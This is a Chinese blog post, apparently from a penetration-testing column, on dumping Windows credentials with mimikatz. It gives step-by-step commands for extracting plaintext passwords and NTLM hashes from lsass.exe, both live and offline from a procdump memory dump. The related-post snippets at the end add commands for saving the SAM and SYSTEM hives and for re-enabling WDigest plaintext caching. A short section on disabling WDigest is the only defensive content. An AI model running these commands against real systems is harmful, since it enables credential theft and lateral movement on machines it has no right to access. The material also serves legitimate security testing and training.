利用mimikatz抓取密码及散列值

最新推荐文章于 2024-01-12 00:13:54 发布
最新推荐文章于 2024-01-12 00:13:54 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: 内网渗透 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/112687294
版权

目录

windows系统散列值获取

域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法)
LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐
NTLM HASH:MD4加密。

前提介绍

抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略.

工具:

  1. Mimikatz
  2. Procdump(微软官方工具)
在线读取散列值及明文密码
C:\tools>mimikatz.exe
privilege::debug  //提权
log
sekurlsa::logonpasswords  //提取密码(散列值和hash)

在这里插入图片描述

离线读取lsass.dmp文件

  1. procdump导出lsass.dmp文件
    procdump.exe -accepteula -ma lsass.exe lsass.dmp
    在这里插入图片描述

  2. 将lsass.dmp放置在mimikatz目录中,通过加载到mimikatz
    sekurlsa::minidump lsass.dmp
    在这里插入图片描述

  3. 导出密码散列值
    sekurlsa::logonpasswords full
    在这里插入图片描述

防范

关闭wdigest,无法从内存中获得明文密码

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

 
GOT IT!持续更新~

 
******************************************************
具体利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
密码抓取神器mimikatz
02-02
抓取整个windows系列的密码神器,必须在DOS命令提示符下以管理员身份运行;首先输入命令:privilege::debug 接着输入命令:sekurlsa::logonpasswords ,即可查看到相关信息
Mimikatz Windows 密码抓取神器
05-27
Mimikatz Windows 密码抓取神器
mimikatz获取系统密码
03-28
获取系统级别密码
mimikatz抓取管理员密码常用工具
12-10
mimikatz抓取管理员密码常用工具,有x64 x32位对应系统上传运行抓取
mimikatz密码读取.zip
04-16
用户密码提取,使用方式含在压缩包中
导出lsass内存各种方法
qq_18193739的博客
08-08 448
导出lsass内存各种方法,mimikatz读取密码
c++封装exe_渗透基础——从lsass.exe进程导出凭据
weixin_39900437的博客
11-28 346
0x00 前言本文将要结合自己的经验,介绍不同环境下从lsass.exe进程导出凭据的方法,结合利用思路,给出防御建议。 0x01 简介本文将要介绍以下内容:·从lsass.exe进程导出凭据的常用方法。·限制上传文件长度时导出凭据的方法。· 限制下载文件长度时导出凭据的方法。 0x02 从lsass.exe进程导出凭据的常用方法1.使用mimikatz直接导出凭据直接从lsass...
ATT&CK-T1003-001-操作系统凭据转储:LSASS内存
swordheart的博客
12-07 877
攻击者可能会尝试访问存储在本地安全机构子系统服务 (LSASS) 进程内存中的凭证材料。用户登录后,系统生成各种凭证材料,存储在LSASS进程内存中。这些凭证材料可以由管理用户或 SYSTEM 获取,并用于使用使用备用身份验证材料 进行横向移动 。与内存技术一样,LSASS 进程内存可以从目标主机转储并在本地系统上进行分析。例如,在目标主机上使用 procdump: 在本地,可以使用以下方式运行 mimikatz: 也可以使用内置的 Windows 工具,例如 comsvcs.dll: W
Windows获取密码及hash
LuckySec
05-04 3155
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash ,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatzMimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
windows抓取用户密码
ATpiu的博客
07-14 3826
前言 windows环境下,一般推荐用procdump配合mimikatz来读取密码。 使用procdump的原因是微软官方的,不容易出问题。 条件 已获得当前windows管理员权限 管理员登录过该系统,且当前系统运行着lsass.exe进程 利用 从https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载procdump。 使用管理员权限运行cmd,切换到procdump所在目录,运行procdump64.exe -ac
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
HTB-Blackfield(域、禁用预身份认证、RPC更改密码、lsass.DMP文件、SeBackupPrivilege提权)
墨痕诉清风的博客
05-28 984
使用rpcclient,我发现我可以运行的命令有限,而使用smbclient,我可以列出机器上的所有共享。但是,在此之前,我想运行enum 4linux扫描,因为我发现我能够获得对这两个服务NULL访问。出于这个原因,我们将需要使用帖子中的DiskShadow示例来制作C:\ drive的阴影副本,然后我们将能够复制ntds.dit文件,因为它不会“使用”。由于所有的目录都是空的,我复制了所有的用户名并将它们粘贴到一个名为user.txt的TXT文件中,以使用kerbrute查看哪些是有效的。
mimikatz】内网渗透工具 下载 基本操作+【procdump】 下载 操作
最新发布
吉吉的博客
01-12 1253
内网渗透,Windows域渗透工具 mimikatz和procdump 下载 + 基本操作
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2558
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp文件,并导出其中的明文密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 注册表读取密码主要获取的是3个文件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 2569
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
Mimikatz使用
qq_46804551的博客
04-04 626
简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 3799
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
mimikatz+ProcDump离线读取win2008及以下用户密码
q996966912的博客
09-01 677
win2008读取普通用户密码
mimikatz的使用
热门推荐
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
使用L0phtCrack获取密码和使用mimikatz直接抓取Windows明文密码区别总结
03-22
L0phtCrack和mimikatz都是用于获取Windows系统密码的工具,但它们的工作原理不同。L0phtCrack是一款密码破解软件,它通过暴力破解、字典攻击等方式获取密码。而mimikatz则是一款密码抓取工具,它可以直接从Windows系统内存中获取明文密码。因此,L0phtCrack获取的密码可能需要一定的时间才能破解成功,而mimikatz则可以直接获取明文密码,速度更快。另外,使用L0phtCrack需要对密码进行破解,可能会被系统检测到并触发安全警报,而使用mimikatz则可以在不留下痕迹的情况下获取密码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值